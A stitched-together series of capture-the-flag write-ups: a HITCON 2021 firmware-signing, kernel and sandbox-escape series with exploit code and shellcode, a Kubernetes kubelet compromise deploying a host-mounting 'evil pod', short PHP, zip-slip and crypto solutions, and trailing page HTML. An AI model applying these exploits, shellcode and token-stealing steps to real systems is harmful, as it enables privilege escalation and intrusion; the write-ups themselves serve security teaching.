In short, we have to find a number $N'$ that is equal to the challenge's $N$ in the lowest 128 bytes such that $\phi(N')$ is easy to compute. Once we have $\phi(N')$ we can compute the private key and sign our own firmware. The intended solution is to look for a prime $N'$, since then $\phi(N') = N' - 1$, but we didn't think about this during the CTF and instead looked for a composite $N'$ that was easy to factor by setting bits above 1024.
Our teammate Aaron eventually found that $N' = (N \mod 2^{1024}) + 2^{1034}$ works and factors to 13 * 691267 * 20502125755394762434933579089125449307897345968084091731229436353808955447773787435286551243437724264561546459801643475331591701959705793105612360650011316069145033629055595572330904990306691542449400499839249687299626423918040370229280752606812185791663127069532707770334540305571214081730144598191170073. This script produces a valid signature for an arbitrary binary:
```pyfrom pwn import *from hashlib import sha256from math import prod
context.arch = "amd64"shellcode = read('shellcode.bin')
header = p32(len(shellcode))header += p8(0x82)header += bytes.fromhex("0fff0ee945bd4176f55a40543b3666843a0d565c339e5d8969fcd7ca921cc303a1c8af16240c4d032d1931632b90996dd48aebacee307d3c57bc83375698ae7df90d10163edee9e067ce46e738092257dafb15b80fb65961900deffa9b59b57e472bf56be0d9f648ad6908f2553be13a9ea0cda24317756cba5142a95e21f9e000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
factors = [13, 691267, 20502125755394762434933579089125449307897345968084091731229436353808955447773787435286551243437724264561546459801643475331591701959705793105612360650011316069145033629055595572330904990306691542449400499839249687299626423918040370229280752606812185791663127069532707770334540305571214081730144598191170073]phi=prod([i-1 for i in factors])dec=pow(0x10001,-1,phi)
act = int.from_bytes(sha256(shellcode).digest(), "little")header += int.to_bytes(pow(act, dec, prod(factors)), 256, 'little')
with open("firmware", "wb") as f: f.write(header + shellcode)```
Now that we can sign and load our own firmware, we only have to write some code that loads the flag using the `get_flag` syscall and makes it available to the client. The easiest way is to have our client allocate and map a buffer in the CHAOS memory, then send a request to CHAOS. The firmware can then copy the flag in the response buffer and exit. Since we hadn't yet finished reversing the interface between CHAOS and the driver, we just wrote a firmware that copies the flag everywhere in the CHAOS memory instead of finding the buffer that the client is using.
```x86asmBITS 64DEFAULT rel
dram_size equ 0x100000dram_start equ 0x10000000dram_end equ dram_start + dram_size
.copy_loop2: ; get flag mov rdi, dram_start mov eax, 0xC89FC syscall
mov rax, dram_start + 0x50
.copy_loop mov rsi, dram_start mov rdi, rax mov rcx, 0x50 rep movsb
add rax, 0x50 cmp rax, dram_end jb .copy_loop
jmp .copy_loop2
; exitmov edi, 0mov eax, 60syscall```
```cstruct request { int field_0; int field_4; int field_8; int field_c; int field_10; int field_14; int out_size;};
int main(void){ int fd = open("/dev/chaos", O_RDWR); assert(fd >= 0);
assert(ioctl(fd, 0x4008CA00, 0x1000) >= 0);
uint8_t *mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0); assert(mem != MAP_FAILED);
struct request req = { .field_0 = 1, .field_4 = 0, .field_8 = 32, .field_c = 256, .field_10 = 32, .field_14 = 0, .out_size = 256, }; ioctl(fd, 0xC01CCA00, &req;;
write(1, mem + 0x20, 0x50);
return 0;}```
Flag: `hitcon{when the secure bootloader is not secure}`
## Part 2: Kernel
The flag for this part is in the VM, only readable to root. This means that we have to somehow exploit the kernel from our unprivileged client to become root. We control both the userspace client and the firmware, so we can attack the kernel from both sides.
### DMA attack
CHAOS uses a virtual PCI device. PCI is interesting from an attacker's point of view because it is bus mastering, which means that the devices can DMA to the host's memory. Pwning the kernel from such a device would be really easy because the device can read and write to all of physical memory. Unfortunately the virtual PCI device in Qemu doesn't use DMA, so it's impossible to DMA to the host memory from the device's firmware. All that the firmware can do is to write to its MMIO registers and its dedicated memory. Too bad.
### CHAOS driver analysis
We cannot directly attack the VM's kernel from the firmware, so it is very likely that we will need to find a bug in the driver and exploit it. We spent a few hours reversing the driver and understanding how it works and eventually found some bugs.
Recall that the driver uses two ring buffers to communicate with CHAOS. The driver puts commands in the command queue and receives responses in the response queue. Here is the code that adds a new command to the queue:
```cint chaos_mailbox_request(struct chaos_mailbox *mailbox, struct chaos_request *req){ struct chaos_cmd_desc cmd_desc = {0};
// Generate a request ID. int request_id = _InterlockedExchangeAdd(&mailbox->request_id, 1) + 1; // Copy the request to the CHAOS memory. int ret = chaos_dram_alloc(mailbox->chaos_state->dram_pool, 28LL, &dram_request); if (ret != 0) { return ret; }
struct chaos_req *dram_req = dram_request.virt_addr; memcpy(dram_req, req, sizeof(struct chaos_request));
struct chaos_state *chaos_state = mailbox->chaos_state; uint64_t cmd_tail = chaos_state->csrs.virt_addr->cmd_tail;
mutex_lock(&mailbox->cmdq_lock); uint64_t cmd_head = chaos_state->csrs.virt_addr->cmd_head;
// Check if the command queue is already full. if ((cmd_head ^ cmd_tail) == 512) { mutex_unlock(&mailbox->cmdq_lock); chaos_dram_free(pool, &dram_request); return -16; }
cmd_desc.req_id = request_id; cmd_desc.unk = 1; cmd_desc.buf_offset = dram_request.phys_addr - pool->dram_io_map->phys_addr; cmd_desc.size = 28;
// Add the request to the command queue. memcpy(&mailbox->cmd_queue.virt_addr[cmd_head & 0xfffffffffffffdff], &cmd_desc, sizeof(cmd_desc)); chaos_state->csrs.virt_addr->cmd_head = (cmd_head + 1) & 0x3FF; mutex_unlock(p_cmdq_lock);
// Set the response to pending in the response queue. int resp_idx = request_id & 0x1FF; mailbox->responses[resp_index].result = -100;
// Send an interrupt to the device. chaos_state->csrs.virt_addr->device_irq = 1;
_cond_resched(); uint32_t result = mailbox->responses[resp_index].result; bool timed_out = false;
// Wait for the request to complete. if (result == -100) { long time_left = 2000;
struct wait_queue_entry wq_entry; init_wait_entry(&wq_entry, 0);
prepare_to_wait_event(&mailbox->waitq, &wq_entry, 2LL);
// Wait up to 2000 jiffies. result = mailbox->responses[resp_index].result; while (time_left != 0 && result == -100) { time_left = schedule_timeout(time_left); prepare_to_wait_event(&mailbox->waitq, &wq_entry, 2LL); result = mailbox->responses[resp_index].result; }
timed_out = time_left == 0 && result == -100; finish_wait(&mailbox->waitq, &wq_entry); }
chaos_dram_free(pool, &dram_request);
if (timed_out) { return -110; }
if ((result & 0x80000000) != 0) { dev_err(mailbox->chaos_state->device, "%s: fw returns an error: %d", "chaos_mailbox_request", result); return -71; }
req->out_size = result;
return 0;}```
This function can write out of bounds of the command queue (which has size 512) if the head index of the command queue is greater than 512. At first glance it looks like this can never happen because the driver always ANDs the value of the head index with 0x3FF when incrementing it and then again with 0xdff when accessing the queue, so the index should always be at most 511. However the driver is not the only component that can modify the head index. The firmware also has access to it and can set it to arbitrary values. The following PoC sets the index to a very big value and panics the kernel with a page fault:
```cint main(void){ int fd = open("/dev/chaos", O_RDWR); assert(fd >= 0);
assert(ioctl(fd, 0x4008CA00, 0x1000) >= 0);
uint8_t *mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0); assert(mem != MAP_FAILED);
struct request req = { .field_0 = 1, .field_4 = 0, .field_8 = 32, .field_c = 256, .field_10 = 32, .field_14 = 0, .out_size = 256, }; ioctl(fd, 0xC01CCA00, &req;; ioctl(fd, 0xC01CCA00, &req;;
return 0;}```
```x86asmBITS 64DEFAULT rel
csr_start equ 0x10000
; overwrite the command queue's head pointer.mov rax, 0x4141414141414141mov [csr_start + 0x50], rax
; exitmov edi, 0mov eax, 60syscall```
```[ 2.964179] general protection fault, probably for non-canonical address 0x505019505070504d: 0000 [#1] SMP NOPTI[ 2.965393] CPU: 0 PID: 78 Comm: run Tainted: G O 5.15.6 #5[ 2.966232] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g155821a1990b-prebuilt.qemu.org 04/01/2014[ 2.967558] RIP: 0010:chaos_mailbox_request+0x159/0x2e0 [chaos][ 2.968249] Code: 48 89 d0 48 83 c2 01 80 e4 fd c7 44 24 2c 1c 00 00 00 81 e2 ff 03 00 00 4c 8d 04 40 4a 8d 04 80 4c 8b 44 24 23 48 03 44 24 10 <4c> 89 00 44 8b 44 24 2b 44 89 40 08 44 0f b6 44 24 2f 44 88 40 0c[ 2.970407] RSP: 0018:ffffc900001b7df8 EFLAGS: 00010207[ 2.971016] RAX: 505019505070504d RBX: ffffc900001b7ec4 RCX: 0000000000000002[ 2.971841] RDX: 0000000000000142 RSI: 0000000000000100 RDI: ffff888003f39058[ 2.972662] RBP: ffff888003eff2e8 R08: 0040000100000002 R09: ffffc90000204000[ 2.973483] R10: 000000000000003c R11: 00000000000000ca R12: 0000000000000000[ 2.974303] R13: 4141414141414141 R14: ffff888003f39028 R15: ffff888003f421a8[ 2.975126] FS: 0000000000408718(0000) GS:ffff88801f200000(0000) knlGS:0000000000000000[ 2.976047] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033[ 2.976704] CR2: 000000000042eb90 CR3: 0000000003f68000 CR4: 00000000000006f0[ 2.977526] Call Trace:[ 2.977820] <TASK>[ 2.978071] ? selinux_file_ioctl+0x16f/0x210[ 2.978582] chaos_fs_ioctl+0x11c/0x230 [chaos][ 2.979108] __x64_sys_ioctl+0x7e/0xb0[ 2.979560] do_syscall_64+0x3b/0x90[ 2.979981] entry_SYSCALL_64_after_hwframe+0x44/0xae```
The interrupt handler, which reads the result queue, has the same bug but this time it reads out of bounds instead of writing:
```cvoid chaos_mailbox_handle_irq(struct chaos_mailbox *mailbox){ struct chaos_state *chaos_state = mailbox->chaos_state; struct chaos_resp_desc *result_queue = mailbox->output_queue.virt_addr; raw_spin_lock(&mailbox->spinlock); uint64_t i = chaos_state->csrs.virt_addr->result_head; while (i != chaos_state->csrs.virt_addr->result_tail) { desc = &result_queue[i & 0xfffffffffffffdff]; i = (i + 1) & 0x3FF; id = desc->req_id; result = desc->result; resp = &mailbox->responses[desc->req_id & 0x1FF]; resp->req_id = id; resp->result = result; } chaos_state->csrs.virt_addr->result_head = i; spin_unlock(&mailbox->spinlock); _wake_up(&mailbox->waitq, 3, 1, 0);}```
This gives us an out of bounds read/write, which should be enough to completely own the kernel.
### Exploit
The bug we found gives us an out of bounds write relative to the address of the command queue. The index is 64-bit so we can write to almost any address (bit 9 of the index is cleared before accessing the queue). We can write a 13-byte command descriptor containing predictable data.
```cstruct __attribute__((packed)) chaos_input_rb_desc { // Set by the driver, but predictable. uint16_t req_id; // Always 0 uint16_t gap; // Always 1 uint8_t unk; // Set by the driver, value between 0 and 0x100000 uint32_t buffer_offset; // Always 28 uint32_t buffer_size;};```
To get an idea of where our buffer could be and what could be around it we had a look at the kernel's documentation, which includes a [map of the kernel's address space on x86](https://www.kernel.org/doc/Documentation/x86/x86_64/mm.txt). The command queue is located in the CHAOS device memory, and the driver uses `devm_ioremap` to map that region into virtual memory. `ioremap` allocates virtual memory from the vmalloc region (`0xffffc90000000000-0xffffe90000000000` on x86_64), so the ring buffer will be somewhere in that region. After looking around in GDB for a while we noticed that the kernel stack of our process is also located there. This makes sense, because the kernel's stacks are also [allocated](https://elixir.bootlin.com/linux/latest/source/kernel/fork.c#L246) from the vmalloc region by default. However even more importantly it looked like the kernel's stack is at a constant, or at least predictable, offset from the command queue. This means that we should be able to reliably overwrite a specific value saved on the stack with contorlled data without needing any leaks.
There are many ways to exploit this. The target VM has no SMEP and no SMAP, which means that we can redirect any kernel data and code pointers to memory controlled by us in userspace. With some trial and error to figure out which offsets would overwrite what value, we found that offset `0x13b13b13b13ad88c` reliably overwrites a saved `rbp` on the kernel's stack. This value depends on what other `vmalloc` allocations the kernel did before running the exploit so it's somewhat specific to the setup we used but it works reliably. The overwrite clears the top 16 bits of the saved `rbp`, which redirects it to a userspace address. We can mmap this address and gain control of the kernel's stack as soon as the kernel executes a `leave` instruction. We then only have to fill the fake stack with a pointer to some shellcode.
```cstatic void alloc_rbp(size_t offset) { uint64_t *rbp = mmap(0x00000003001cf000 + 0x040000000*offset, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0); assert(rbp != MAP_FAILED); for (size_t i = 0; i < 0x1000 / 8; i++) { rbp[i] = &pwn_kernel; }}```
The shellcode is pretty simple: it reads the IA32_LSTAR, which contains the address of the system call handler, to recover address of the kernel and then overwrites `core_pattern` with the path to our exploit. It then executes `swapgs; sysret` to return to userspace. The exploit returns to userspace at an invalid address and crashes, which runs the core dump handler, which is now our exploit itself. The core dump handler runs as root, so our exploit can read the flag and print it to the serial console.
```x86asmBITS 64DEFAULT relglobal pwn_kernel
kernel_base equ 0xffffffff81000000syscall_handler_off equ 0xffffffff81c00000 - kernel_basecore_pattern_off equ 0xffffffff82564060 - kernel_base
pwn_kernel: ; read IA32_LSTAR, which contains the address of the syscall handler mov ecx, 0xc0000082 rdmsr shl rdx, 32 or rax, rdx
mov rbx, syscall_handler_off sub rax, rbx ; rbx = kernel base mov rbx, rax
mov rax, core_pattern_off mov rcx, rbx ; rcx = core_pattern add rcx, rax
; overwrite core_pattern mov rbx, '|/home/c' mov [rcx], rbx mov rbx, 'haos/run' mov [rcx + 8], rbx xor ebx, ebx mov [rcx + 16], rbx
; return to userspace and crash xor ecx, ecx mov r11, 0x002 swapgs sysret```
```cint main(int argc, char* argv[]){ if (getuid() == 0) { system("cat /flag > /dev/ttyS0"); return 0; } /* ... */}```
Flag: `hitcon{so this is how we attack kernel from a device}`
## Part 3: Sandbox
### Analysis
The flag for part 3 is also a file outside the sandbox. However unlike in part 1, there is no system call that copies the flag into the CHAOS memory for us. The sandbox only opens the file that contains the third flag, but then doesn't do anything with it. Clearly this means that we must somehow pwn the sandbox and read the contents of the file somewhere into shared memory where our firmware can access them. As we mentioned before, the sandbox has some system calls that let the chip perform some cryptographic operations on data supplied by the firmware. More specifically, the sandbox implements the following:
* MD5* SHA256* AES encrypt/decrypt* RC4 encrypt/decrypt* Blowfish encrypt/decrypt* Twofish encrypt/decrypt* Threefish encrypt/decrypt
Except for MD5 and SHA256, all of these operations also need a key. The client can use the `add_key` and `delete_key` to add and remove keys from the sandbox's key storage. The key storage is implemented as a `std::map<uint32_t, struct buffer>`, which maps a key ID to the key data and is implemented using a search tree.
Now, except for MD5, SHA256 and RC4 all of the algorithms implemented in the sandbox are block ciphers, which take a fixed-size block of input and produce a block of output having the same size as the input. The block size is usually a fixed value chosen by the designers of the algorithm.
Consider now the function that implements Threefish encryption, which has a block size of 32 bytes:
```cvoid threefish_encrypt(struct buffer *output, struct buffer *key, struct buffer *input){ if (key->size != 32) { _exit(2); } size_t size = input->size; if ((size & 7) != 0 || size > 0x20) { _exit(2); } output->data = NULL; output->size = size; if ((unsigned int)(size - 1) > 0xFFFFF) { _exit(2); } uint8_t *out = new uint8_t[size]; output->data = out; do_threefish_encrypt(key->data, key->size, input->data, out);}```
While the function checks that the size of the input is not bigger than the block size, it doesn't check that it's exactly equal to the block size. On top of that it allocates an output buffer whose size is the same as the size of the input, rather than a fixed-size buffer. This means that the encryption can write out of bounds if we pass it an input buffer that is smaller than 32 bytes. All block ciphers have this bug but it's only exploitable with threefish because it's the only cipher with a block size greater than 24 bytes, which is the smallest usable buffer returned by glibc's malloc. This bug gives us a 8-byte out of bounds read and an 8 byte out of bounds write on a heap chunk of size 24 (the input data is also assumed to be 32 bytes).
Ok, so we have a heap overflow and overread, how can we exploit this? Fortunately, if we do overflow, we do so directly into the size field of the next chunk. Therefore, our goal was to overflow the size field of a small chunk with a large size. However, there were a bunch of complications before achieving this.
The biggest issue we were facing, is the fact that both encryption and decryption do not (directly) allow for a controlled overflow. Encryption, of course, leads to mostly gibberish in the overflown area. Furthermore, since our input also has to be smaller than 32 bytes, part of the encryption input is from the next heap chunk! This also makes it nontrivial to get a controlled overflow with decryption, since we do not control part of the encrypted input, that will be decrypted.
The intended solution here, was to use crypto to your advantage and figure out a way, such that known but not controlled input also decrypts to something you wanted. However, we found a much easier approach, that did not involve pinging our crypto people on discord ;).
We first present the heap setup we want to have, then how we actually achieved that.The basic setup we need, is the following, where the three separate parts of the heap, can be anywhere.
The sizes shown are the actual sizes used by malloc (so rounded up to the nearest 0x10).Furthermore, except the sizes for the input / output chunks, the other sizes are not particularly specific.However, we do need to have `sizeof(L) >> sizeof(S)`. The goal is to now roughly have the following happen [^1]:
```cvoid* I_E = malloc(0x20);void* O_E = malloc(0x20);void* I_D = O_E;void* O_D = malloc(0x20);threefish_encrypt(I_E, O_E);threefish_decrypt(I_D, O_D);```
In particular, the purpose of the different chunks are as follows:
- $I_E$: input to the threefish encryption using overflow. The encryption will read the size of the next chunk $L$ oob, as the last 8 bytes of input.- $O_E$ / $I_D$: output of the threefish encryption, but then also input of the threefish decryption. During encryption, the size of the next chunk will be overwritten. During decryption, the size of the next chunk will be read oob, as the last 8 bytes of input.- $O_D$: output of the threefish decryption. The size of the next chunk will be overwritten, with the last 8 bytes of output.- $L$: A large chunk. We will overwrite the size of $S$, with this size.- $D$: A chunk that is never freed. Since we corrupt the size with the encryption, we do not want to free it, otherwise malloc is unhappy.- $S$: A small chunk. Target for our overwrite.
This works out well, since we do not change the input of our encryption before decryption, the output of the decryption must be the same as our initial input. Since the initial input's last 8 bytes was a large size, the small size of $S$ will be overwritten with this large size. If we now allocate $S$, free it again, it will be in the tcache of a much larger size than it should be. We can then allocate a chunk of size $0x150$ and get back $S$. Then we have a fully controlled overflow of a much larger area of the heap.
This whole procedure is shown in the image below:
So our goal is now clear, we need the specific heap layout and allocations mentioned before.But how do we get there?
There are two major pain points in trying to achieve this.Firstly, the heap is not in a clean state when we start our exploit, since the firmware loading also uses the heap already.Secondly, there are no good malloc and free primitives. To get the heap into a certain state, ideally we would be able to malloc and free arbitrary sizes. The best primitive we found, was the addition and removal of keys. While it allows us to malloc an arbitrarily sized chunk and free it later, it also has a major drawback. The malloc of the size we control, happens in between a `malloc(0x10)` and a `malloc(0x30)`. The former to act as a kind of wrapper around our malloc'd buffer, the latter as the node in a red-black-tree. This is the case, because the different keys are saved inside an `std::map`.
Astute readers will have noticed, that the wrapper struct is actually of the same size as our target buffers to overflow.In fact, both of these pain points can help us out in certain ways.
We will now show the heap feng shui of our exploit, then explain why the different allocations work and how they help us towards our goal. But first, we explain the `do_malloc` and `do_free` functions. These correspond to adding and removing a key respectively. As such, a simplified view of these is basically:
```csize_t do_malloc(size_t size) { void* buffer = malloc(0x10); void* key_buf = malloc(size); void* tree_node = malloc(0x30); size_t key_id = curr_id; curr_id++; keys[key_id] = (buffer, key_buf, tree_node);}
void do_free(size_t key_idx) { (buffer, key_buf, tree_node) = keys[key_id]; free(tree_node); free(key_buf); free(buffer);}```
Now our heap feng shui is written as:
```csize_t first = do_malloc(0x80);
size_t inp_prepare = do_malloc(0x150);size_t dont_free = do_malloc(0x70);size_t small = do_malloc(0x50);
size_t reserved_for_later = do_malloc(0x80);size_t reserved_for_later2 = do_malloc(0x80);
do_free(dont_free);do_free(first);size_t dont_free2 = do_malloc(0x70);size_t dont_free_begin = do_malloc(0x90);do_free(small);do_free(dont_free_begin);do_free(inp_prepare);```
Since `do_malloc` first allocs a chunk of size 0x20, then our desired size, we can use it as a primitive for achieving the three parts of the heap we need, as long as the two mallocs happen from a contiguous region. Thankfully, the firmware was allocated as a large heap chunk and after freeing it, put in the unsorted bin. Therefore, as long as our allocation size's tcache is empty, the malloc happens contiguously from this unsorted bin. Hence, our chunks from before can be identified:
- $I_E$ ` = inp_prepare.buffer`- $O_E$ / $I_D$ ` = dont_free.buffer = dont_free_begin.buffer`- $O_D$ ` = small.buffer`- $L$ ` = inp_prepare.key_buf`- $D$ ` = dont_free.key_buf = dont_free2.key_buf`- $S$ ` = small.key_buf`
This also explains the very first allocation. It is done to remove the single 0x20 chunk currently in the tcache.`inp_prepare` then corresponds to our first heap part, the first input buffer and the large chunk.`dont_free` corresponds to the second heap part, while `small` to the third.Both `reserved_for_later` use a key_buf chunk on the tcache, while the tree_node will be allocated just after our small chunk.This will be our target for overwriting with the controlled overflow later.
Finally, we have to do some freeing to get our tcache in the correct order. In the end, we would like the have the following tcache for 0x20:
```head -> inp_prepare.buffer -> dont_free.buffer -> small.buffer```
To this end, we first swap the buffer struct used for `dont_free` and `first`. Otherwise, we would have to free `dont_free.key_buf`, which we do not want! For that, we first free it temporarily, leading to the following tcache 0x20:
```head -> first.buffer -> dont_free.buffer```
Furthermore, `dont_free.key_buf` is the head of tcache 0x70. Therefore, `do_malloc(0x70)`, will use `first.buffer` as the buffer, and `dont_free.key_buf` as its key_buf. Since we never touch the result of this malloc (`dont_free2`) again, we can be safe that `dont_free.key_buf` (or as named above $D$) is never freed! Lastly, `dont_free_begin.buffer` now points to `dont_free.buffer` and hence the last three frees achieve exactly the tcache layout we want.
Therefore, the next part of our exploit looks as follows:
```cres = do_crypto(THREEFISH_ENC, random_data, 24, test_key_idx);if (res < 0) { puts("enc failed");}
memcpy(temp_crypt, crypt_result, 24);
size_t rid_of_inp = do_malloc(0x140);
res = do_crypto(THREEFISH_DEC, temp_crypt, 24, test_key_idx);
if (res < 0) { puts("dec failed");}
puts("smashed size!");```
First we encrypt. This will use the first entry in the tcache as input, the second as output. Then we make sure to remove the first entry in the tcache. Next we decrypt, and again first entry in tcache is input (previously of course our output), the second as output. This all leads to our desired goal, of smashing the size of `small.key_buf` with `0x160`.
We now malloc and free `small.key_buf`, to put it onto the correct tcache:
```csize_t small_smashed = do_malloc(0x50);do_free(small_smashed);```
The next time we add a key of size `0x150`, we will overflow `small.key_buf` by a lot!We now free the chunks reserved for later:
```cdo_free(reserved_for_later2);do_free(reserved_for_later);```
This will now do the following for the tcache of size 0x40 (remember those chunk's tree_node were allocated after `small.key_buf`):
```head -> reserved_for_later.tree_node -> reserved_for_later2.tree_node -> ...```
When we now overflow `small.key_buf`, we can set `fd` of the chunks that are in tcache.Due to the way the allocations work, we need to create some fake chunks first, which we point to.The fake chunks are created as follows inside dram:
```cputs("Creating fake chunks");
uint64_t* fake_chunk = dram + 0x20000;uint64_t* fake_chunk2 = dram + 0x20080;fake_chunk[-1] = 0x41;fake_chunk[0] = fake_chunk2;fake_chunk[1] = 0;
fake_chunk2[-1] = 0x41;// this is the address we actually wanna overwritefake_chunk2[0] = fd_addr;fake_chunk2[1] = 0;
uint64_t* fake_chunk4 = dram + 0x20100;fake_chunk4[-1] = 0x21;fake_chunk4[0] = 0;fake_chunk4[1] = 0;
uint64_t* fake_chunk3 = dram + 0x20180;fake_chunk3[-1] = 0x21;fake_chunk3[0] = fake_chunk4;fake_chunk3[1] = 0;```
Now we can finally overflow:
```cputs("smashing actual chunks");
memset(overwrite, 'A', sizeof(overwrite));
uint64_t* over = &overwrite[0];
// Due to the free of the reserved_for_later chunks// We also need to fixup these buffer chunks on the heap.over[31] = 0x21;over[32] = fake_chunk3;over[33] = 0;// This is our actual target!over[23] = 0x41;over[24] = fake_chunk;over[25] = 0;
size_t my_key = add_key(overwrite, sizeof(overwrite));```
The tcache for 0x20 and 0x40 now looks as follows:
```chead[0x20] -> reserver_for_later.buffer -> fake_chunk3 -> fake_chunk4head[0x40] -> fake_chunk -> fake_chunk2 -> fd_addr // location of flag1 file descriptor```
Hence, if we create two keys of length 0x30, the second key allocation will be overwriting fd_addr, allowing us to change the file descriptor from flag1 to the one for flag3. Then we can just reuse our exploit for the first flag:
```cuint32_t* fd_over = &fd_overwrite[0];// remote:*fd_over = 1;// local:// *fd_over = 4;size_t fd_key = add_key(fd_overwrite, 0x30);size_t fd_key2 = add_key(fd_overwrite, 0x30);
puts("Read flag");
while (true) { syscall1(0xC89FC, dram);
printf("flag: %s\n", dram);
for (int i = 0x100; i < 0x50000; i += 0x100) { memcpy(dram + i, dram, 0x100); }}```
[^1]: Note that the mallocs will actually happen at different times, this is just to illustrate the basic idea.
Flag: `hitcon{threefishes~sandbox~esacape}`
## Conclusion
Thanks to david942j and lyc for putting together this series of challenges, they were really fun to solve. You can find the source code for the challenges together with the official solution [on github](https://github.com/david942j/hitcon-2021-chaos). Until next time! |
# Uni CTF 2021 Quals
## SteamCloud Cloud category challenge write-up :
Last weekend me and my team #Heaven's_Birds participated in Uni CTF 2021 Quals organized by @ HacktheBox .
From the description we knew we were dealing with a k8s cluster. First we attempted to scan the host address we got after starting the machine ( which was different than the node's address running the cluster).
Basically we expected some K8s ports to be opened( See: [https://kubernetes.io/docs/reference/ports-and-protocols/](https://kubernetes.io/docs/reference/ports-and-protocols/) ), after running `nmap -sC -p-` on host and as expected we found the **Kubelet API** port opened **10250.
We tried then to list existing pods by sending a get request to `[http://10.129.96.107:10250/pods](http://10.129.96.107:10250/pods)` , the response returned pods from `kube-system` namespace and one pod from `default` one. It was an nginx pod, and it also listed an interesting address `10.129.96.98` which was the address of the node running the cluster ( the cluster was deployed on a single machine using minikube so the master and worker node are the same machine).
After googling a lil bit we found this interesting tools to communicate with kubelet API **`Kubeletctl`
After playing around lil bit with the tool, we run a scan for rce by issuing `kubeletctl scan rce` command. and the result was that nginx pod (and also kube-proxy) were vulnerable to remote code execution. Then we head to `/run/secrets/kubernetes.io/serviceaccount/` to grab the credentials for the default service account that we are going to use later when interacting with `***kube-apiserver.`***
A quick scan on the host address found before lists our famous `8443` kube-apiserver port. We can now use kubectl command and the token we grabbed before to interact with kube-apiserver.
We also played with the command a lil bit trying to list pods and other resources , but we could only list cluster nodes and pods using:
**`kubectl --insecure-skip-tls-verify=true --server="[https://$](https://%24/){IP_ADDRESS}:8443" \--token="${TOKEN}" \get nodes,pods --namespace=default`.
We tried then to deploy a pod if we have permission to that, and it was successfully deployed , but we had one issue the pod kept showing `ImagePullBackOff`, we knew then the image is not going to be pulled so we decide to use an already pulled image from the nginx pod configuration, and our evil pod was like the following:
```yamlapiVersion: v1kind: Podmetadata: annotations: labels: name: evil-pod namespace: defaultspec: containers: - image: nginx:1.14.2 imagePullPolicy: Never name: evil-container volumeMounts: - mountPath: /host name: node-mount volumes: - name: node-mount hostPath: path: /```
Our pod was successfully deployed and running, then we had back the our `kubeletclt` command to execute some commands on our pod, of course we tried to execute a shell on the pod but no luck:
`kubectl --insecure-skip-tls-verify=true --server="[https://$](https://%24/){IP_ADDRESS}:8443" \--token="${TOKEN}" \exec -it evil-pod --namespace=default -- /bin/sh`.
The `kubeletctl -s 10.129.96.98 exec "ls -la /host" -p evil-pod -c evil-container` command is to check that our hostPath was successfully mount on the node, and is was.
Then `kubeletctl -s 10.129.96.98 exec "ls -la /host/root/flag.txt" -p evil-pod -c evil-container` to cat the flag.
**HTB{d0n7_3Xpo53_Ku83L37}. |
# Tricks 2:Web:270ptsAnother round of PHP Tricks, good luck. [Click here](https://ch6.sbug.se/)
# Solutionアクセスすると第二のPHP問であることがわかる。 [site.png](site/site.png) ```php mb_strlen($_GET[base64_decode('Yg==')],base64_decode('dXRmOA=='))){if(strlen($_GET[base64_decode('Yg==')])>mb_strlen($_GET[base64_decode('YQ==')],base64_decode('dXRmOA=='))){$u327a6c4304ad5938=file_get_contents(base64_decode('Li4vLi4vZmxhZw=='));echo $u327a6c4304ad5938;}else{echo base64_decode('QWxyaWdodC4=');}}else{echo base64_decode('VHJ5IGhhcmRlci4=');}}else{highlight_file(__FILE__);die();}?> ```邪魔なbase64などを取っ払うと以下になる。 ```phpmb_strlen($_GET['b'],'utf8')){ if(strlen($_GET['b'])>mb_strlen($_GET['a'],'utf8')){ $u327a6c4304ad5938=file_get_contents('../../flag'); echo $u327a6c4304ad5938; }else{ echo 'Alright.'; } }else{ echo 'Try harder.'; }}else{ highlight_file(__FILE__); die();}?>```strlenがmb_strlenより長くなるものを二つ与えてやればよい。 strlenはバイト数を返すのでマルチバイト文字を利用すればよいことがわかる。 ```bash$ curl "https://ch6.sbug.se/?a=あ&b=あ"SBCTF{d1d_y0u_kn0w_abou7_7h47?}```日本語でおｋ
## SBCTF{d1d_y0u_kn0w_abou7_7h47?} |
### TL;DRSlippy was the easy-rated web challenge that involved a pretty sparse web app. After an initial code review, we’ll take the name as a clue and do some research into the “Zip Slip” archetype of vulnerability. Knowing that the Flask app is in debug mode, we can leverage the “zip slip” vulnerability to overwrite routes.py to include our SSTI vulnerability, which we can use to get RCE and grab the flag. Full details in the link. |
## Short description
For each input bit, a `key` number and `fake` number is generated. A random `keystream` is generated and a corresponding public list, such that```public[i] = [fake[i], key[i]] if keystream[i] else [key[i], fake[i]]```The input is XORed with the random `keystream` to generate the ciphertext and this is output together with `public`. But `fake` was generated by just XORing values from `key`, and based on this, we can guess which values from `public` are from `fake`. The others must be from `key`, allowing us to recover the `keystream` and decrypt the flag.
## Exploit script
The following script finds the values that must have come from `key`, one by one from last to first:
```key = []k = 0for i in range(ln): for a, b in public: if a == k: key.append(b) break elif b == k: key.append(a) break k = xor_list(key[-ln // 3:])```The `keystream` can then be recovered and the flag decrypted:```keystream = recover_keystream(key, public)flag = bits_to_bytes(xor(enc, keystream))print(flag.decode())```
Click the link for a much more detailed writeup. |
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com">
